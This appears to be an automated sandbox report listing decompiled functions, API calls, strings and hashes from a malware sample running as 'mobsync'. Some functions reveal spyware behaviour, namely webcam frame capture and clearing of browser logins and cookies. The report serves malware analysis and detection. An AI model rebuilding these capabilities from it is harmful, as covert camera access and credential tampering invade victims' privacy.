Opcode Fuzzy Hash: f7bd64f0aa5cc713437930bcea8c593d52bea72142ba88d224d3689b8af6da83
Instruction Fuzzy Hash: 3FF096B290022C7EEB009BE9DC85EEFBF7CEB44795F000436F604E6020D5705D148BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405165, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00405165(void* __ecx, void* __edi) {
				void* __ebx;
				long _t19;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				intOrPtr _t38;

				_t29 = __edi;
				_t30 = __ecx;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				if( *((intOrPtr*)(__ecx + 0x5c)) <= 0) {
					L3:
					 *((char*)(_t30 + 0x50)) = 0;
					_t38 =  *0x46bb07; // 0x0
					if(_t38 != 0) {
						_t32 = _t31 - 0x18;
						E00402064(0, _t31 - 0x18, "Connection timeout");
						E00402064(0, _t32 - 0x18, "[WARNING]");
						E004165D8(0, _t29);
					}
					L00404DD5(_t30);
					return 1;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t19 = WaitForSingleObject( *(_t30 + 0x54), 0x3e8);
					 *((intOrPtr*)(_t30 + 0x60)) =  *((intOrPtr*)(_t30 + 0x60)) + 1;
					_t28 =  *((intOrPtr*)(_t30 + 0x60));
					if(_t19 == 0) {
						break;
					}
					if(_t28 <  *((intOrPtr*)(_t30 + 0x5c))) {
						continue;
					}
					goto L3;
				}
				CloseHandle( *(_t30 + 0x54));
				 *(_t30 + 0x54) = 0;
				 *((char*)(_t30 + 0x50)) = 0;
				SetEvent( *(_t30 + 0x58));
				return 0;
			}

0x00405165
0x00405167
0x0040516b
0x00405171
0x00405190
0x00405190
0x00405193
0x00405199
0x0040519b
0x004051a5
0x004051b4
0x004051b9
0x004051be
0x004051c3
0x00000000
0x00000000
0x00000000
0x00000000
0x00405173
0x00405173
0x0040517b
0x00405181
0x00405184
0x00405189
0x00000000
0x00000000
0x0040518e
0x00000000
0x00000000
0x00000000
0x0040518e
0x004051d1
0x004051da
0x004051dd
0x004051e0
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405160), ref: 0040517B
CloseHandle.KERNEL32(?), ref: 004051D1
SetEvent.KERNEL32(?), ref: 004051E0

Strings

[WARNING], xrefs: 004051AF
Connection timeout, xrefs: 004051A0

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection timeout$[WARNING]
API String ID: 2055531096-1470507543
Opcode ID: dbe06993c3495f353b91b2fec297e0ec7d735e1d7cea4128712d1b7a61d2805b
Instruction ID: ae60f77654cc690ea069452027dfbba6838492d045179776455cce24e18ac643
Opcode Fuzzy Hash: dbe06993c3495f353b91b2fec297e0ec7d735e1d7cea4128712d1b7a61d2805b
Instruction Fuzzy Hash: C301D431A04F40AFC725BF35895651BBFA1EF0134A740083EE48396AA2CBB99408CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00404466, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 201
sleepCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00404466(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char** _a8, signed int _a12) {
				char _v8;
				void* _v40;
				char _v44;
				char _v52;
				char _v60;
				char _v76;
				void* __esi;
				void* __ebp;
				void* _t25;
				char** _t27;
				intOrPtr* _t29;
				intOrPtr _t45;
				signed int _t54;
				signed int _t56;
				char* _t59;
				void* _t63;
				signed int _t64;
				void* _t66;
				signed int _t75;
				void* _t78;
				void* _t124;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t135;
				void* _t138;
				void* _t139;
				intOrPtr* _t140;

				_push(__edi);
				_t120 = _a8;
				_t124 = __ecx;
				_t25 = E004027BA(__ecx, _a8);
				_t78 = _t124;
				_t146 = _t25;
				if(_t25 == 0) {
					_push(__ebx);
					E00402899(_t78, __edx, 0);
					_t27 = E0040221F();
					_t75 = _a12;
					_a8 = _t27;
					_t115 =  *_t27;
					__eflags =  !_t115 - _t75;
					if( !_t115 <= _t75) {
						E004028B8(_t124);
						asm("int3");
						_push(_t124);
						_t29 = L00401F75( &_v8);
						E00404286( &_v8,  &_v44, 4, 0xffffffff);
						_t138 = (_t135 & 0xfffffff8) - 0xc;
						E004020CC(_t75, _t138, _t115, __eflags, 0x46c238);
						_t139 = _t138 - 0x18;
						E004020CC(_t75, _t139, _t115, __eflags,  &_v60);
						L00416DD0( &_v76, _t115);
						_t140 = _t139 + 0x30;
						_t126 =  *_t29 - 0x3c;
						__eflags = _t126;
						if(__eflags == 0) {
							_t127 = E0040A15B(L00401F75(L00401E29( &_v52, _t115, __eflags, 0)));
							__eflags = _t127;
							if(_t127 != 0) {
								 *0x46bac4 = E0040A1B1(_t127, "OpenCamera");
								 *0x46bac0 = E0040A1B1(_t127, "CloseCamera");
								_t45 = E0040A1B1(_t127, "GetFrame");
								_t115 = "FreeFrame";
								 *0x46bac8 = _t45;
								 *0x46babc = E0040A1B1(_t127, "FreeFrame");
								 *0x46baaa = 1;
								E004020CC(_t75, _t140 - 0x18, "FreeFrame", __eflags, 0x46c1b8);
								_push(0x1b);
								goto L23;
							}
						} else {
							_t128 = _t126 - 1;
							__eflags = _t128;
							if(_t128 == 0) {
								__eflags =  *0x46ba77;
								if(__eflags != 0) {
									goto L20;
								}
							} else {
								_t129 = _t128 - 1;
								__eflags = _t129;
								if(_t129 == 0) {
									 *0x46bac0();
									 *0x46ba77 = 0;
								} else {
									_t130 = _t129 - 1;
									__eflags = _t130;
									if(_t130 == 0) {
										_t54 =  *0x46bac4();
										 *0x46ba77 = _t54;
										__eflags = _t54;
										if(__eflags == 0) {
											goto L15;
										} else {
											L20:
											_t115 = E00436079(_t49, L00401F75(L00401E29( &_v52, _t115, __eflags, 0)));
											E004046E8(_a4, _t51, __eflags);
										}
									} else {
										_t131 = _t130 - 1;
										__eflags = _t131;
										if(_t131 == 0) {
											_t56 =  *0x46bac4();
											 *0x46ba77 = _t56;
											__eflags = _t56;
											if(__eflags == 0) {
												L15:
												E004020CC(_t75, _t140 - 0x18, _t115, __eflags, 0x46c1b8);
												_push(0x41);
												L23:
												E00404A6E(_t75, _a4, _t115, __eflags);
											} else {
												_t59 = E00436079(_t57, L00401F75(L00401E29( &_v52, _t115, __eflags, _t131)));
												 *_t140 = 0x3e8;
												Sleep(??);
												_t115 = _t59;
												E004046E8(_a4, _t59, __eflags);
												 *0x46bac0();
											}
										}
									}
								}
							}
						}
						L00401E54( &_v52, _t115);
						L00401FA7();
						L00401FA7();
						__eflags = 0;
						return 0;
					} else {
						_t62 =  &(_t115[_t75]);
						_a12 =  &(_t115[_t75]);
						__eflags = _t75;
						if(__eflags != 0) {
							_push(0);
							_t64 = E004027F5(_t75, _t124, _t115, _t120, __eflags, _t62);
							__eflags = _t64;
							if(_t64 != 0) {
								_push( *_a8);
								_t66 = E00402209(_t124);
								E0040157F(E00402209(_t124) + _t75 * 2, _t66);
								_push(_t75);
								E0040156B(E00402209(_t124), _t120);
								E00402868(_a12);
							}
						}
						_t63 = _t124;
						goto L7;
					}
				} else {
					_t63 = E0040359F(__ebx, _t124, __edx, _t120 - E00402209(_t78) >> 1, _t124, _t146, _t78, _t124, _t120 - E00402209(_t78) >> 1, _a12);
					L7:
					return _t63;
				}
			}

0x0040446a
0x0040446b
0x0040446e
0x00404471
0x00404476
0x00404478
0x0040447a
0x00404494
0x00404497
0x0040449e
0x004044a3
0x004044a6
0x004044a9
0x004044af
0x004044b1
0x00404512
0x00404517
0x00404524
0x00404525
0x00404538
0x0040453d
0x00404547
0x0040454c
0x00404556
0x0040455f
0x00404564
0x00404567
0x00404567
0x0040456a
0x0040465d
0x0040465f
0x00404661
0x00404674
0x00404685
0x0040468c
0x00404691
0x00404696
0x004046a5
0x004046ac
0x004046b8
0x004046bd
0x00000000
0x004046bd
0x00404570
0x00404570
0x00404570
0x00404573
0x0040460f
0x00404616
0x00000000
0x00000000
0x00404579
0x00404579
0x00404579
0x0040457c
0x004045fd
0x00404603
0x0040457e
0x0040457e
0x0040457e
0x00404581
0x004045ec
0x004045f2
0x004045f7
0x004045f9
0x00000000
0x004045fb
0x0040461c
0x00404638
0x0040463a
0x0040463a
0x00404583
0x00404583
0x00404583
0x00404586
0x0040458c
0x00404592
0x00404597
0x00404599
0x004045d6
0x004045e0
0x004045e5
0x004046bf
0x004046c2
0x0040459b
0x004045ad
0x004045b4
0x004045bb
0x004045c4
0x004045c6
0x004045cb
0x004045cb
0x00404599
0x00404586
0x00404581
0x0040457c
0x00404573
0x004046cb
0x004046d4
0x004046dc
0x004046e1
0x004046e7
0x004044b3
0x004044b3
0x004044b6
0x004044b9
0x004044bb
0x004044bd
0x004044c2
0x004044c7
0x004044c9
0x004044d0
0x004044d2
0x004044e3
0x004044ed
0x004044f5
0x00404502
0x00404502
0x004044c9
0x00404507
0x00000000
0x00404509
0x0040447c
0x0040448d
0x0040450a
0x0040450d
0x0040450d

APIs

Sleep.KERNEL32(00000000,?), ref: 004045BB

Part of subcall function 004046E8: __EH_prolog.LIBCMT ref: 004046ED

Strings

FreeFrame, xrefs: 00404691
GetFrame, xrefs: 00404680
CloseCamera, xrefs: 0040466F
OpenCamera, xrefs: 00404663

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
API String ID: 3469354165-3547787478
Opcode ID: 9e491bfddf862d473c7d7c14de48086643124863ef2cd0ce3d4de598d839976e
Instruction ID: 5a17ec9c29155d9da4fdaf8b9e23beca59789b2fbc5ce9981412f47b601f43b7
Opcode Fuzzy Hash: 9e491bfddf862d473c7d7c14de48086643124863ef2cd0ce3d4de598d839976e
Instruction Fuzzy Hash: 5851E4B1604211ABCA04BB76DC5AA6E3B559BC1708F00053FF905AB7E2EF7D890587DE

Uniqueness

Uniqueness Score: -1.00%

Function 00441AE1, Relevance: 7.7, APIs: 5, Instructions: 171
timeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00441AE1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				int _t93;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t88 = __edi;
				_t96 = E0044154B();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E004415A9( &_v8);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043629A();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x46a00c; // 0x44c884ad
					_v56 = _t38 ^ _t106;
					 *0x46a344 =  *0x46a344 | 0xffffffff;
					 *0x46a338 =  *0x46a338 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t77 = "TZ";
					_t89 = 0;
					 *0x46b748 = 0;
					_t42 = E004391A5(__eflags,  &_v316,  &_v312, 0x100, "TZ");
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E0043E61D(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E004391A5(__eflags,  &_v276, _t101, _v272, _t77);
								__eflags = _t50;
								if(_t50 == 0) {
									L0043EE85(0);
									_t89 = _t101;
								} else {
									_push(_t101);
									goto L25;
								}
							} else {
								_push(0);
								L25:
								L0043EE85();
							}
						}
					} else {
						_t89 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t89 -  &_v268) & _t89;
					__eflags = _t89;
					if(__eflags == 0) {
						L33:
						E00441AE1(_t77, _t89, _t100, __eflags);
					} else {
						__eflags =  *_t89;
						if(__eflags == 0) {
							goto L33;
						} else {
							_push(_t89);
							E0044190C(_t77, _t89, _t100, __eflags);
						}
					}
					L0043EE85(_t100);
					__eflags = _v12 ^ _t106;
					return E0042F61B(_v12 ^ _t106);
				} else {
					_t54 = E00441551( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E0044157D( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							L0043EE85( *0x46b740);
							 *0x46b740 = 0;
							 *_t107 = 0x46b750;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x46b750 * 0x3c;
								_t87 =  *0x46b7a4; // 0x0
								_push(__edi);
								 *0x46b748 = 1;
								_v8 = _t85;
								_t116 =  *0x46b796; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t87 * 0x3c;
								}
								_t118 =  *0x46b7ea; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x46b7f8; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t87) * 0x3c;
									}
								}
								_t93 = E0043E1EC(0, _t87);
								if(WideCharToMultiByte(_t93, 0, 0x46b754, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t93, 0, 0x46b7a8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E00441545()) = _v8;
							 *(E00441539()) = _v12;
							_t61 = E0044153F();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

0x00441ae1
0x00441af0
0x00441af7
0x00441afb
0x00441afe
0x00441b01
0x00441b06
0x00441b09
0x00441c31
0x00441c31
0x00441c32
0x00441c33
0x00441c34
0x00441c35
0x00441c36
0x00441c3b
0x00441c3f
0x00441c47
0x00441c4e
0x00441c51
0x00441c5e
0x00441c65
0x00441c66
0x00441c68
0x00441c6d
0x00441c7c
0x00441c83
0x00441c8b
0x00441c8d
0x00441c97
0x00441c9a
0x00441ca7
0x00441caa
0x00441cac
0x00441cc5
0x00441ccd
0x00441ccf
0x00441cd5
0x00441cda
0x00441cd1
0x00441cd1
0x00000000
0x00441cd1
0x00441cae
0x00441cae
0x00441caf
0x00441caf
0x00441caf
0x00441cdc
0x00441c8f
0x00441c8f
0x00441c8f
0x00441ce9
0x00441ceb
0x00441ced
0x00441cef
0x00441cff
0x00441cff
0x00441cf1
0x00441cf1
0x00441cf4
0x00000000
0x00441cf6
0x00441cf6
0x00441cf7
0x00441cfc
0x00441cf4
0x00441d05
0x00441d10
0x00441d1b
0x00441b0f
0x00441b13
0x00441b18
0x00441b1b
0x00000000
0x00441b21
0x00441b25
0x00441b2a
0x00441b2d
0x00000000
0x00441b33
0x00441b39
0x00441b3e
0x00441b44
0x00441b54
0x00441b5a
0x00441b61
0x00441b67
0x00441b6b
0x00441b71
0x00441b74
0x00441b7b
0x00441b82
0x00441b82
0x00441b85
0x00441b8c
0x00441ba4
0x00441ba4
0x00441ba7
0x00441b8e
0x00441b8e
0x00441b95
0x00000000
0x00441b97
0x00441b99
0x00441b9f
0x00441b9f
0x00441b95
0x00441baf
0x00441bcb
0x00441bdb
0x00441bd2
0x00441bd4
0x00441bd4
0x00441bf9
0x00441c0b
0x00441c00
0x00441c03
0x00441c03
0x00441bf9
0x00441c15
0x00441c1f
0x00441c24
0x00441c29
0x00441c30
0x00441c30
0x00441b2d
0x00441b1b

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045912C), ref: 00441B4B
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B754,000000FF,00000000,0000003F,00000000,?,?), ref: 00441BC3
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B7A8,000000FF,?,0000003F,00000000,?), ref: 00441BF0
_free.LIBCMT ref: 00441B39

Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,00000000,00000000,00000000,00000000,?,00447D43,00000000,00000007,00000000,?,0044828E,00000000), ref: 0043EE9B
Part of subcall function 0043EE85: GetLastError.KERNEL32(00000000,?,00447A9F,00000000,00000000,00000000,00000000,?,00447D43,00000000,00000007,00000000,?,0044828E,00000000,00000000), ref: 0043EEAD

_free.LIBCMT ref: 00441D05

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 3929a0d67aaa716754734b495f110d19b0b6549c1295d5d32f2fd139f409bd66
Instruction ID: 72a7bbd3543858052ef4a8e776e9b52013f5e56b1ee86729b2dafd24fcd61b93
Opcode Fuzzy Hash: 3929a0d67aaa716754734b495f110d19b0b6549c1295d5d32f2fd139f409bd66
Instruction Fuzzy Hash: 5051EA71900219AFEB10DF66DC819AA7BBCEF80315F10426BE411D32A1EB789DC1CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0043C2CD, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0043C2CD(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x46a00c; // 0x44c884ad
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = L00440C0D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E0042E9F4(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0042E9F4(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0042E9F4(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00446905(_t56);
						_t40 = L0043EE85(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00446905(_t56);
						L0043EE85(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x46a00c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x0043c2cd
0x0043c2d7
0x0043c2db
0x0043c2dd
0x0043c2e1
0x0043c2eb
0x0043c2fc
0x0043c301
0x0043c303
0x0043c305
0x0043c307
0x0043c309
0x0043c30d
0x0043c3c7
0x0043c3d5
0x0043c3d7
0x0043c3dc
0x0043c3e3
0x0043c3e5
0x0043c3f3
0x0043c402
0x0043c405
0x0043c407
0x00000000
0x0043c408
0x0043c315
0x0043c31a
0x0043c31f
0x0043c321
0x0043c321
0x0043c323
0x0043c328
0x0043c32c
0x0043c32c
0x0043c32f
0x0043c34e
0x0043c34e
0x0043c350
0x0043c353
0x0043c35c
0x0043c35f
0x0043c364
0x0043c367
0x0043c36c
0x00000000
0x00000000
0x0043c36e
0x00000000
0x0043c331
0x0043c331
0x0043c333
0x0043c33c
0x0043c33f
0x0043c344
0x0043c347
0x0043c34c
0x0043c376
0x0043c379
0x0043c37b
0x0043c37e
0x0043c386
0x0043c38c
0x0043c393
0x0043c395
0x0043c39d
0x0043c3ac
0x0043c3b0
0x0043c3b2
0x0043c3b5
0x00000000
0x00000000
0x0043c3b7
0x0043c3ba
0x0043c3bc
0x0043c3bc
0x0043c3bd
0x0043c3bf
0x0043c3c2
0x00000000
0x0043c3bc
0x00000000
0x0043c34c
0x0043c32f
0x00000000

APIs

_free.LIBCMT ref: 0043C33F
_free.LIBCMT ref: 0043C35F

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f5a743782674b4330f893bb4fce6fbdccd014e0b763f5d5a9f30bb5d138f4f29
Instruction ID: b8c2f117a08c9f7e3d0690f36157727bc88d5e2796b8de3530b344be676623de
Opcode Fuzzy Hash: f5a743782674b4330f893bb4fce6fbdccd014e0b763f5d5a9f30bb5d138f4f29
Instruction Fuzzy Hash: A641F772A002109FCB10DF79C881A6EB3B5EF89314F15816EE915EB341EB34ED01CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0040A8C0, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 103
sleepCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040A8C0(void* __edi) {
				char _v5;
				char _v6;
				char _v7;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t18;
				void* _t36;
				intOrPtr _t40;
				char _t50;
				void* _t52;
				signed int _t53;
				signed int _t54;
				void* _t55;

				_t52 = __edi;
				_t54 = _t53 & 0xfffffff8;
				 *0x46bafd = 1;
				Sleep( *0x46baf8);
				_v7 = 0;
				_t36 = 0;
				_v6 = 0;
				_v5 = 0;
				goto L1;
				do {
					do {
						L1:
						_t59 = _t36;
						if(_t36 == 0) {
							L2:
							_t36 = E0040A7A6(_t59);
						}
						_t60 = _t36;
						if(_t36 == 0) {
							_t36 = E0040A5CA(_t52, _t60);
						}
						_t61 = _v6;
						if(_v6 == 0) {
							_v6 = E0040A3AF(_t36, _t52, _t61);
						}
						_t62 = _v7;
						if(_v7 == 0) {
							_v7 = E0040A320(_t52, _t62);
						}
						_t50 = _v5;
						_t63 = _t50;
						if(_t50 == 0) {
							_t50 = E0040A291(_t52, _t63);
							_v5 = _t50;
						}
						if(_t36 == 0 || _t36 == 0) {
							L16:
							Sleep(0x1388);
							_t18 = _v7;
							_t40 = _v6;
							_t50 = _v5;
						} else {
							_t18 = _v7;
							if(_t18 == 0 || _t50 == 0) {
								goto L16;
							} else {
								_t40 = _v6;
								if(_t40 == 0) {
									goto L16;
								}
							}
						}
						if(_t36 == 0) {
							goto L2;
						}
					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
					_t73 = _t40;
				} while (_t40 == 0);
				_t55 = _t54 - 0x18;
				E00402064(_t36, _t55, "\n[Cleared browsers logins and cookies.]\n");
				E0040AA8C(_t36, _t50, _t73);
				E00402064(_t36, _t55, "Cleared browsers logins and cookies.");
				_t56 = _t55 - 0x18;
				E00402064(_t36, _t55 - 0x18, "[Info]");
				E004165D8(_t36, _t52);
				E00402064(_t36, _t56 + 0x18, 0x45f6ac);
				_push(0xaf);
				E00404A6E(_t36, 0x46c768, _t50, _t73);
				if( *0x46bafc != 0) {
					E004105A0(0x46c518, L00401F75(0x46c518), "FR", 1);
				}
				 *0x46bafd = 0;
				return 0;
			}

0x0040a8c0
0x0040a8c3
0x0040a8ce
0x0040a8d5
0x0040a8e1
0x0040a8e5
0x0040a8e7
0x0040a8ed
0x0040a8ed
0x0040a8f1
0x0040a8f1
0x0040a8f1
0x0040a8f1
0x0040a8f3
0x0040a8f5
0x0040a8fa
0x0040a8fa
0x0040a8fc
0x0040a8fe
0x0040a905
0x0040a905
0x0040a90b
0x0040a90d
0x0040a914
0x0040a914
0x0040a91c
0x0040a91e
0x0040a925
0x0040a925
0x0040a929
0x0040a92d
0x0040a92f
0x0040a936
0x0040a938
0x0040a938
0x0040a93e
0x0040a958
0x0040a95d
0x0040a963
0x0040a967
0x0040a96b
0x0040a944
0x0040a944
0x0040a94a
0x00000000
0x0040a950
0x0040a950
0x0040a956
0x00000000
0x00000000
0x0040a956
0x0040a94a
0x0040a971
0x00000000
0x00000000
0x0040a973
0x0040a98b
0x0040a98b
0x0040a993
0x0040a99d
0x0040a9a2
0x0040a9ae
0x0040a9b3
0x0040a9bd
0x0040a9c2
0x0040a9d1
0x0040a9d6
0x0040a9e0
0x0040a9ec
0x0040aa01
0x0040aa07
0x0040aa08
0x0040aa15

APIs

Sleep.KERNEL32 ref: 0040A8D5
Sleep.KERNEL32(00001388), ref: 0040A95D

Strings

[Cleared browsers logins and cookies.], xrefs: 0040A998
Cleared browsers logins and cookies., xrefs: 0040A9A9
[Info], xrefs: 0040A9B8

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
API String ID: 3472027048-899236412
Opcode ID: 3f7be5c3891df1a83b283ae5d6789ee724f769fe131bef6f37433340bc1942a2
Instruction ID: 19d006f3e93ca70ec29b0e88cbd9a77eefac28184490fc762d726c12d351d6c4
Opcode Fuzzy Hash: 3f7be5c3891df1a83b283ae5d6789ee724f769fe131bef6f37433340bc1942a2
Instruction Fuzzy Hash: 7B3190013483816ECA1577B6142A7AB7F824A93748F09847FF9C4373D3DABA4859936F

Uniqueness

Uniqueness Score: -1.00%

Function 0041729F, Relevance: 7.6, APIs: 5, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041729F(void* __ecx, long __edx, WCHAR* _a4, long _a8) {
				void* _v8;
				long _v12;
				long _t10;
				long _t11;
				struct _OVERLAPPED* _t16;
				struct _OVERLAPPED* _t21;
				long _t24;
				long _t27;
				void* _t30;

				_push(__ecx);
				_push(__ecx);
				_t21 = 0;
				_v8 = __ecx;
				_t27 = __edx;
				_t10 = _a8;
				if(_t10 == 0) {
					_t11 = 0x40000000;
					_t24 = 2;
				} else {
					if(_t10 != 1) {
						_t11 = _a8;
						_t24 = _a8;
					} else {
						_t11 = 4;
						_t24 = _t11;
					}
				}
				_t30 = CreateFileW(_a4, _t11, _t21, _t21, _t24, 0x80, _t21);
				if(_t30 != 0xffffffff) {
					if(_a8 != 1 || SetFilePointer(_t30, _t21, _t21, 2) != 0xffffffff) {
						if(WriteFile(_t30, _v8, _t27,  &_v12, _t21) != 0) {
							_t21 = 1;
						}
						CloseHandle(_t30);
						_t16 = _t21;
						goto L13;
					} else {
						CloseHandle(_t30);
						goto L6;
					}
				} else {
					L6:
					_t16 = 0;
					L13:
					return _t16;
				}
			}

0x004172a2
0x004172a3
0x004172a9
0x004172ab
0x004172af
0x004172b1
0x004172b3
0x004172cb
0x004172d0
0x004172b5
0x004172b8
0x004172c1
0x004172c4
0x004172ba
0x004172bc
0x004172bd
0x004172bd
0x004172b8
0x004172e4
0x004172e9
0x004172f3
0x00417320
0x00417322
0x00417322
0x00417325
0x0041732b
0x00000000
0x00417305
0x00417306
0x00000000
0x00417306
0x004172eb
0x004172eb
0x004172eb
0x0041732d
0x00417333
0x00417333

APIs

